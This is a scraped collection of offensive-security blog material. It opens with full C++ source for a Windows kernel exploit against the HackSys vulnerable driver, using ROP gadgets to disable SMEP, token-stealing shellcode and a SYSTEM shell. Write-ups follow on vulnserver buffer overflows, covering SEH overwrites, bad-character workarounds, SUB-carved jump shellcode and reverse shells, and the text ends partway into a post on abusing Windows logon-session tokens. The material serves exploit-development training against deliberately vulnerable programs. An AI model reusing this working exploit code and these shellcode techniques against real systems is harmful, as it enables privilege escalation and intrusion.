#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL                   0x222003

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver" << endl;
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: 0x" << hex
        << (INT64)hFile << endl;

    return hFile;
}

void send_payload(HANDLE hFile, INT64 kernel_base) {

    cout << "[>] Allocating RWX shellcode..." << endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        //found_system:
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS
        "\xc3";

    LPVOID shellcode_addr = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    cout << "[>] Shellcode allocated in userland at: 0x" << (INT64)shellcode_addr
        << endl;

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

    // keep this here for testing so you can see what normal buffers do to subsequent routines
    // to learn from for execution restoration
    /*
    BYTE input_buff[2048] = { 0 };
    memset(input_buff, '\x41', 2048);
    */

    cout << "[>] Input buff located at: 0x" << (INT64)&input_buff << endl;

    DWORD bytes_ret = 0x0;

    cout << "[>] Sending payload..." << endl;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] DeviceIoControl failed!" << endl;
    }
}

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

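    // The buffer only holds data, so read/write access is enough
    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_READWRITE);

    if (!pModuleInfo) {
        cout << "[!] Failed to allocate the module list buffer." << endl;
        exit(1);
    }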

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

void spawn_shell() {

    cout << "[>] Spawning nt authority/system shell..." << endl;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si); // CreateProcess expects cb to hold the structure size

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        0,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}

int main() {

    HANDLE hFile = grab_handle();

    INT64 kernel_base = get_kernel_base();
    send_payload(hFile, kernel_base);
    spawn_shell();
}

Pyt3ra Security Blogs

Buffer Overflow w/ Restricted Characters

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

3 May 2020 at 12:57

Buffer Overflow Vulnerability w/ restricted characters

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (LTER)

Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

github: https://github.com/pyt3ra/Buffer-Overflow-Restricted-Characters

~//********//~~

For the LTER command, there are two ways to exploit the buffer overflow vulnerability; both exploits have to work around similar restricted characters:

- Part 1: Vanilla Buffer Overflow w/ Restricted Characters

- Part 2: SEH based Buffer Overflow w/ Restricted Characters (covered in a separate write-up)

Let's get started...

Fuzzing

Similar to the GMON write-up, I used boofuzz to do the initial fuzzing.

...and after crashing the program, we recreate the crash using the following Proof-of-Concept

We get a pretty vanilla buffer overflow where the EIP has been overwritten with 41s

Also note that ESP currently points to our buffer. This is key once we figure out an address to redirect our EIP

Now we will need to determine our offset and see exactly which part of our buffer overwrites the EIP register.

As usual, this is accomplished using Metasploit's pattern_create.rb to generate a unique pattern of 3000 characters.

Update our POC with our unique characters, send the exploit, and examine the crash in immunity debugger.

Here we can see that EIP has been overwritten with the following values: 386F4337

Metasploit's pattern_offset.rb can be used to determine the offset with this value.

Once we determine the offset, we update our POC again

We send the POC one more time and examine the crash...if our offset is correct, EIP should be overwritten with x42s

In this case, we can see 42424242 were successfully loaded into the EIP register
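The offset lookup can also be reproduced by hand. The following is a minimal sketch, assuming the pattern follows the usual Aa0Aa1Aa2... layout (uppercase, lowercase, digit); the helper names pattern_create and pattern_offset are chosen here for illustration and are not the Metasploit scripts themselves.

```python
import string
import struct

def pattern_create(length):
    """Build a cyclic Aa0Aa1Aa2... pattern of the requested length."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]

def pattern_offset(eip_value, length=3000):
    """Find where the four bytes that landed in EIP sit inside the pattern."""
    # EIP is read as a little-endian dword, so unpack it back into pattern order
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)

offset = pattern_offset(0x386F4337)  # the EIP value seen in the crash
print(offset)  # 2003 for this pattern
```

The four bytes at that offset are the ones replaced with 42s in the updated POC.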

Finding bad characters

Now that we are able to redirect our EIP...we will need to find an address to redirect the EIP. Since we know that ESP register points to our buffer, we will be looking for a JMP ESP address.

However, before we choose an address, we will need to verify if there are any bad characters.

We update the POC with the following 256 unique hex characters

After running a few tests, we verify that anything over 7F has 7F subtracted from it, as we can see below in our dump….such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f

Now we will need a call esp or jmp esp address…this will ultimately land us in our 'Cs', where our reverse shell will be loaded, while keeping in mind the restricted characters.

We find the following address using mona.py in immunity debugger

FF E4 = jmp esp

Address: 62501203

We can verify this address is a JMP ESP by searching it
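Before committing to a return address, it helps to confirm that none of its bytes fall outside the allowed set. A minimal sketch, assuming the allowed range is 0x01 to 0x7F as listed above; the helper name restricted_bytes is made up for this example, and 625010B4 (a POP-POP-RET address from the SEH write-ups) is included only as a counterexample.

```python
import struct

ALLOWED = set(range(0x01, 0x80))  # assumption: 0x00 is avoided as well

def restricted_bytes(address):
    """Return the bytes of a little-endian address that the filter would mangle."""
    packed = struct.pack("<I", address)
    return [b for b in packed if b not in ALLOWED]

print(restricted_bytes(0x62501203))  # [] -> safe to use
print(restricted_bytes(0x625010B4))  # [180] -> 0xB4 would be mangled
```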

At this point, we can update our EIP overwrite to redirect to this JMP ESP address

As we follow the crash in immunity, we can see that EIP has been successfully overwritten with our JMP ESP address

...once we take the JMP ESP, we are redirected to the top of our Cs

Reverse shell time!

We will need to create our reverse shell and encode it with x86/alpha_mixed in order to avoid the restricted characters

We update our POC one last time

Again we follow the jmp esp and we hit the beginning of our reverse shell. We let the code execution continue and successfully get a reverse shell in our Kali listener.

Final Proof-of-Concept

Pyt3ra Security Blogs

SEH Based Buffer Overflow with Restricted Characters

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

3 May 2020 at 12:22

Structured Exception Handling (SEH) Based Buffer Overflow Vulnerability w/ Restricted Characters

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (LTER)

Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

Github: https://github.com/pyt3ra/SEH-based-Buffer-Vulnerablity-128-Restricted-Hex-Characters-

~~~~~//********//~~~~~~

Fuzzing

Fuzzing with boofuzz

We open the boofuzz result using SQLite browser

Recreating the crash with our Proof-of-concept

As usual, we examine the crash using Immunity Debugger and see that our SEH handler address has been overwritten with our buffer

Calculating Offset

We use Metasploit's pattern_create.rb and pattern_offset.rb to generate unique characters and calculate the offset.

Updated POC

The following values overwrite the SEH handler

...which then equates to the following offset positions.

Once again, we update the Proof-of-Concept with the following offset calculations and verify if we can see these values after the crash

Finding restricted characters

After running a few tests, it looks like anything over 7F has 7F subtracted from it, as we can see below in our dump….such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

At this point we have successfully done the following:

1. Successfully produced a crash to the program with the buffer we provided

2. Calculated the offset values for address redirection

3. Found all the restricted characters

POP-POP-RET...the key to SEH Based Buffer Overflow Vulnerabilities

I will be using the same POP-POP-RET address from the Vulnserver.exe (GMON) write-up

We update the POC with the following values...I also added some NOPs for the other 4 bytes

We cannot forget about the restricted characters (hex 80 to FF)

We get a crash, however, we can see that our POP-POP-RET address has been changed from 625010B4 to 62501035, where the last byte has been changed (B4 - 7F = 35)

Also note, that our 90s have been changed to 11 (90 - 7F = 11)...we will worry about this part later
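The mangling seen in the debugger can be modelled in a few lines. This is only a sketch of the observed behaviour (bytes above 7F arrive reduced by 7F), not the actual vulnserver code; the function name mangle is hypothetical.

```python
def mangle(data):
    """Model the observed filter: every byte above 0x7F arrives reduced by 0x7F."""
    return bytes(b - 0x7F if b > 0x7F else b for b in data)

seh = bytes.fromhex("B4105062")     # 625010B4 in little-endian byte order
print(mangle(seh).hex())            # 35105062 -> read back as 62501035
print(mangle(b"\x90\x90").hex())    # 1111 -> the NOPs become 11s
```

Running candidate bytes through a model like this before sending them shows up front which parts of the buffer will survive.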

We found another POP-POP-RET address

Again, we update the POC with this new POP-POP-RET address

We fire up the POC and set a breakpoint in immunity. As we check the SEH chain plugin, we can confirm that we were able to redirect the SEH handler to the address 6250120B

We allow the execution and hit our breakpoint

We step through the POP POP RET instructions, and we hit our first entry (x90s) or in this case, x11s (90 - 7F)

First Jump

After we are redirected to the pop-pop-ret address we are then sent to the 4 bytes right before it. We will have to use these 4 bytes to get our first jump

For the first jmp we will use the jnz conditional jump and fill the extra bytes with inc instructions. With GMON we used a short jump (EB 06), however, EB is unusable here since it is one of the restricted characters.

At this point eax is 0x00000000, so I used inc to clear the ZF (note that on x86 the single-byte opcode 41 decodes as inc ecx, while inc eax is 40; either one clears the ZF as long as the result is non-zero). Then we do the jump-if-not-zero (jnz) instruction

This jumps past our SEH handler address…also, note that if we follow it in the dump we can see we only have 48 bytes of address space…not enough for a reverse/bind shell.

Second jump

Now we have 48 bytes that we can use to do our second jump while keeping in mind the restricted characters

To circumvent the restricted characters, we will be 'carving' our shellcode with SUB instructions

More info about shellcode carving can be found here: http://vellosec.net/2018/08/carving-shellcode-using-restrictive-character-sets/

First, we will need to realign our stack so that we will know where our decoded jump will show up. In this case, we want our decoded jump opcodes just below our first jump at the following address:

Before we carve it out, we have to realign ESP to address 00E9FFF8 which can be done with the following instructions:

(1)

push esp

pop eax ;move the value of esp to eax

add ax, 0d75 ;add 3445 to eax

add ax, 0465 ;add 1125 to eax

push eax ;push new eax value to the stack

pop esp ;move the value of eax to esp

Note that after we do this, we will need to zero out eax for shellcode carving to work

There are multiple ways to zero out eax (e.g. xor eax, eax), however, these will not work due to the restricted characters

We will use the AND operator using the following values

(2)

AND 554E4D4A = 0101 0101 0100 1110 0100 1101 0100 1010

AND 2A313235 = 0010 1010 0011 0001 0011 0010 0011 0101

--------------------------------------------------------------------------------

             = 0000 0000 0000 0000 0000 0000 0000 0000
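The two masks work because they share no set bits, so ANDing any value with both always leaves zero. A quick sketch to check this, and to confirm that both masks stay inside the allowed 01 to 7F range; the function name and the sample starting values are arbitrary.

```python
MASK_A = 0x554E4D4A
MASK_B = 0x2A313235

def zero_with_ands(eax):
    """Apply AND EAX, MASK_A followed by AND EAX, MASK_B."""
    return eax & MASK_A & MASK_B

# Whatever EAX held before, it ends up as zero
for start in (0x00000000, 0xFFFFFFFF, 0x00E9FFF8, 0xDEADBEEF):
    assert zero_with_ands(start) == 0

# Every byte of both masks is inside the allowed character range
for mask in (MASK_A, MASK_B):
    assert all(0x01 <= b <= 0x7F for b in mask.to_bytes(4, "little"))

print(hex(MASK_A & MASK_B))  # 0x0
```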

(3)

For our second jump, we will be using a reverse short jump: EB 80

In order to carve out EB 80 we use the following values:

\xeb\x80\x90\x90 = 909080EB (read as a little-endian dword)

0 - 909080EB = 6F6F7F15

32103355 + 32103355 + 0B4F 186B = 6F6F7F15

0 - 3210 3355 - 3210 3355 - 0B4F 186b = 909080EB

We will do SUB operations with these values then push the result to the stack
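The arithmetic above can be checked by emulating the three SUB instructions on a zeroed 32-bit register. A minimal sketch; the variable names are illustrative only.

```python
MASK32 = 0xFFFFFFFF

# The bytes we want on the stack, read as a little-endian dword
target = int.from_bytes(b"\xeb\x80\x90\x90", "little")

eax = 0  # EAX after the two AND instructions
for value in (0x32103355, 0x32103355, 0x0B4F186B):
    eax = (eax - value) & MASK32  # SUB EAX, value with 32-bit wraparound

print(hex(target))  # 0x909080eb
print(hex(eax))     # 0x909080eb
```

Since every byte of the three subtracted values is at or below 7F, the instructions survive the filter while the value they leave in EAX does not need to.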

After everything is said and done, our second jump will look like this

We execute our updated POC and trace code execution in immunity debugger

Here we can see that our second jump instructions start at address 00EFFFD1 and then the EB 80 instructions are carved at address 00EFFFFA

Once we take the jmp short 80h, we get another 72-byte address space that we can work with. This can be seen in our hex dump at address 00EFFF7C

Third Jump

After the second jump, the address space is still not big enough for reverse or bind shell...which means we will need to do another jump.

As usual, we will need to realign ESP to set where our decoded instructions will be saved. In this case, ESP currently points at address 00FAFFFD and we would like to point it to 00FAFFAE.

After we store the value of ESP in EAX we execute the following SUB instruction

SUB AL, 4F (00FAFFFD - 4F = 00FAFFAE)

We then pop this address back to ESP

After we run the following instructions, we can see that ESP points to address 00FAFFAE…this is where our decoded jump instructions will be stored

For the third jump, we will be using the following instructions:

\x81\xec\x48\x0d\x00\x00 (SUB ESP, 0D48)

\xff\xe4 (JMP ESP)

00FAFFAE - 0DA0 = 00FAF20E

00FAF20E is the address that is just below the beginning of our buffer....this will give us about 3400+ bytes worth of address space for our final shellcode

We will be carving 4 bytes at a time beginning at the lowest 4 bytes (since this will be pushed into the stack in LIFO manner)

As usual, we zero out EAX first then carve the instructions using SUB instructions before EAX gets pushed into the stack
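Picking the SUB values by hand gets tedious, so here is a rough sketch of how they could be generated. It assumes the allowed byte range is 01 to 7F and reuses the AND masks from earlier; carve, split_byte and carve_stub are hypothetical helper names, and the values produced will differ from the hand-picked ones in the POC.

```python
MASK32 = 0xFFFFFFFF
LOW, HIGH = 0x01, 0x7F  # assumed allowed byte range

def split_byte(total):
    """Split total (3..381) into three values that each fit in LOW..HIGH."""
    x = min(HIGH, total - 2)
    y = min(HIGH, total - x - 1)
    return x, y, total - x - y

def carve(target):
    """Return dwords a, b, c such that 0 - a - b - c == target (mod 2**32)."""
    needed = (-target) & MASK32          # a + b + c must add up to this
    parts = [0, 0, 0]
    carry = 0
    for i in range(4):                   # work from the lowest byte upwards
        total = ((needed >> (8 * i)) & 0xFF) - carry
        carry = 0
        if total < 3:                    # too small to split: overflow into next byte
            total += 0x100
            carry = 1
        for j, value in enumerate(split_byte(total)):
            parts[j] |= value << (8 * i)
    return parts

def carve_stub(payload):
    """Emit AND, AND, SUB x3, PUSH EAX per dword, last dword first (LIFO)."""
    stub = b""
    for off in range(len(payload) - 4, -1, -4):
        target = int.from_bytes(payload[off:off + 4], "little")
        stub += b"\x25" + (0x554E4D4A).to_bytes(4, "little")  # and eax, imm32
        stub += b"\x25" + (0x2A313235).to_bytes(4, "little")  # and eax, imm32
        for value in carve(target):
            stub += b"\x2d" + value.to_bytes(4, "little")     # sub eax, imm32
        stub += b"\x50"                                       # push eax
    return stub

payload = b"\x81\xec\x48\x0d\x00\x00\xff\xe4"  # sub esp, 0xd48 ; jmp esp
stub = carve_stub(payload)
print(len(stub), all(LOW <= b <= HIGH for b in stub))
```

The approach works byte by byte with a carry, which keeps each of the three values inside the allowed range no matter what dword is being carved.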

Here we can see our 4 bytes getting decoded at address 00D0FFBF

...we carve out the next 4 bytes

...and follow the instructions being decoded

This completes our third jump, as we can see we have successfully decoded our next jump instructions @ address 00D0FFBB:

SUB ESP, 0D48

JMP ESP

We continue code execution to get to our SUB ESP and JMP ESP

Here we can see that after the SUB instruction, our ESP points to 00D0F273

We take the JMP ESP and we are provided with 3000+ bytes of address space for our final shellcode

Final Shellcode

At this point, we can use MSF to create a reverse shell encoded with alpha_mixed.

Also, note that we need to add BufferRegister=ESP to get rid of some restricted characters at the beginning of the shellcode.

More info about BufferRegister flag can be found here: https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/

Final POC: https://github.com/pyt3ra/SEH-based-Buffer-Vulnerablity-128-Restricted-Hex-Characters-/blob/master/poc.py

Winsider Seminars & Solutions Inc.

Faxing Your Way to SYSTEM — Part Two

By: Yarden Shafir & Alex Ionescu

30 April 2020 at 18:55

[…]

Pyt3ra Security Blogs

SEH Based Buffer Overflow

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

29 April 2020 at 17:49

Structured Exception Handling (SEH) Based Buffer Overflow Vulnerability

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (GMON)

Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

github: https://github.com/pyt3ra/SEH-Based-Buffer-Overflow-Vulnerability

~//********//~~

Once the application has been downloaded, we run it on our Vista Machine and start fuzzing.

Fuzzing

For fuzzing, I will be using boofuzz, and documentation can be found here:

https://boofuzz.readthedocs.io/en/stable/

First off, we connect to the application to test its functionality--specifically, we will be testing the GMON command as shown below

Here is the boofuzz template/proof-of-concept that I used for fuzzing:

We fire up this python fuzzer and get a crash.

boofuzz generates a fuzzing result database that can be opened with a DB application. For this, I am using sqlitebrowser, which provides a nice SQLite GUI.

We can see in this result (line 24) that our fuzzer sent 5013 bytes before the crash occurred

Proof-of-concept

Here's the original proof-of-concept that I will be using throughout the exploit development

We will begin by recreating the crash using this POC

We fire up this POC and examine the crash in Windows Vista using Immunity Debugger.

We successfully get a crash with our buffer of 41s.

Since this will be an SEH based buffer overflow, we look at the crash in SEH chain which shows that SEH handler address being overwritten with our 41s

After being able to successfully overwrite the SEH handler, we then need to figure out the correct offset. This can be done by feeding our POC a unique pattern that is 5100 bytes long.

We will be using Metasploit's pattern_create.rb as shown below.

We then update our POC with the following unique chars and again fire up our exploit.

The POC successfully crashes the vulnserver.exe program again and we follow the crash in immunity.

Here we can see that SEH has been overwritten with the following values:

326E4531 & 45336E45

We can use these two values to calculate the offset using Metasploit's pattern_offset.rb

Note: Immunity Debugger's mona.py can also be used to create the pattern_create and pattern_offset

We get the following offset:

SEH: 3519

nSEH: 3515

We can use these offset values to update the POC one more time and recalculate our buffer

Again, we fire up the updated POC and examine the crash in immunity.

We can see that nSEH has been overwritten with x42s and the SEH has been overwritten with x43s

Redirecting the SEH Handler

At this point, we have successfully accomplished the following:

1. Fuzzed the vulnerable application given a long string of buffer

2. We have calculated the offset for the SEH Handler

One common way (or only way?) to exploit an SEH based buffer overflow vulnerability is using the POP-POP-RET

This is possible because when an application crashes and the SEH happens, our malicious buffer is loaded into the stack and the crash makes this buffer accessible using the POP-POP-RET sequence of instructions.

More information about POP-POP-RET can be found in this blog:

https://dkalemis.wordpress.com/2010/10/27/the-need-for-a-pop-pop-ret-instruction-sequence/

Bottom right of the immunity debugger crash below shows the current state of the stack after the crash

Our buffer is loaded at address 00FDF1F0 (note that addresses 00FDF1E8 and 00FDF1FC will need to be popped off the stack)

POP - 00FDF1E8

POP - 00FDF1FC

RET - 00FDF1F0 (returns our buffer)

Bad characters are no bueno

Before we look for a POP-POP-RET address and redirect our SEH Handler to it, we need to discover bad characters that will truncate or mangle our exploit.

Searching for bad characters can be accomplished by feeding 255 unique hex characters and following code execution in immunity debugger to see if certain hex characters truncate or mangle our buffer

Again, execute our POC and trace code execution in immunity debugger.

Looking at the hex dump (bottom left), we can see the application took all 255 hex characters (0x01 to 0xff) which means that other than 0x00, all hex characters can be used.

Now we are ready to find any POP-POP-RET address. This can be done using the mona.py plugin in immunity debugger (I couldn't get it to work) or you can just do it manually by opening up the essfunc.dll and searching for these sets of instructions.

I found the POP-POP-RET at address 625010B4

Once again, we update our POC with the SEH Handler redirect address. We examine the crash by adding a breakpoint at address 625010B4 and see if we can hit the breakpoint for a successful redirection.

Note that the address has to be in little-endian format. Also, we added a first jump (EB 06) and 2 NOPs.
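As a rough illustration of the layout, the buffer at this stage could be assembled like this. This is a sketch under stated assumptions: TOTAL_LEN is a placeholder for any length large enough to trigger the crash, and the command prefix and socket code are left out.

```python
import struct

NSEH_OFFSET = 3515   # nSEH offset reported by pattern_offset.rb
TOTAL_LEN = 5000     # assumption: placeholder for the overall buffer length

nseh = b"\xeb\x06\x90\x90"            # first jump (EB 06) followed by 2 NOPs
seh = struct.pack("<I", 0x625010B4)   # POP-POP-RET address, little-endian

buffer = b"A" * NSEH_OFFSET           # filler up to nSEH
buffer += nseh                        # lands at offset 3515
buffer += seh                         # lands at offset 3519
buffer += b"D" * (TOTAL_LEN - len(buffer))

print(seh.hex())  # b4105062
```

struct.pack with "<I" takes care of the byte order, so the address can be written the way the debugger displays it.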

We get another crash and examine the SEH chain, which shows our POP-POP-RET address. If we allow the exception to happen, we are successfully redirected to address 625010B4

We step through the POP-POP-RET codes and we then hit our first jump (EB 06).

...once we take the jmp, we hit the address 00EFFF7D. This gives us roughly 70 bytes of address space. This space is not enough for a reverse or bind shellcode; however, we can utilize this space to jump further.

For our second jump, I am using the following instructions which were straight from the OSCE course.

These instructions basically moves the address of EIP to ECX then 8 bytes of ECX gets decreased before the jump is taken.

These instructions can be written to a nasm file, then objdump can be used to generate the opcodes.

Below shows these instructions and their respective opcodes

Note that at this point, ecx points to address 00EFFD87. We step through the instructions, take the jump and follow the new EIP 00EFFD87 in dump which gives us a bigger address space…512 bytes to be exact

00EFFF8B - 00EFFD87 = 0x204 (516 in decimal, i.e. roughly the 512 bytes gained by the jump)

We update our POC once again with these jump instructions and now we are afforded an address space big enough for our shellcode.

SHELL TIME!

We create a reverse shell.

We update our POC buffer one last time

We execute our POC again and follow code execution in our debugger

And after taking our second jump, we hit our NOPs and if we follow the eip in dump, we can see that our encoded shellcode is just right below it.

If we continue code execution, we hit our shellcode and get a reverse shell in kali

Final POC

Conclusion:

Fuzzed the vulnerable application given a long string of buffer
We have calculated the offset for the SEH Handler
Determine if there are any bad characters
Found a POP-POP-RET address to access our buffer
Use the 4 bytes @ offset 3515 to do our first jump for a 70-byte address space
Use the 70 bytes address space for the second jump which gave us 512 bytes of address space
Add shellcode

Tyranid's Lair

Sharing a Logon Session a Little Too Much

By: tiraniddo

25 April 2020 at 23:34

The Logon Session on Windows is tied to a single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? Well, if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Are there any primitives which SMB supports which allow you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

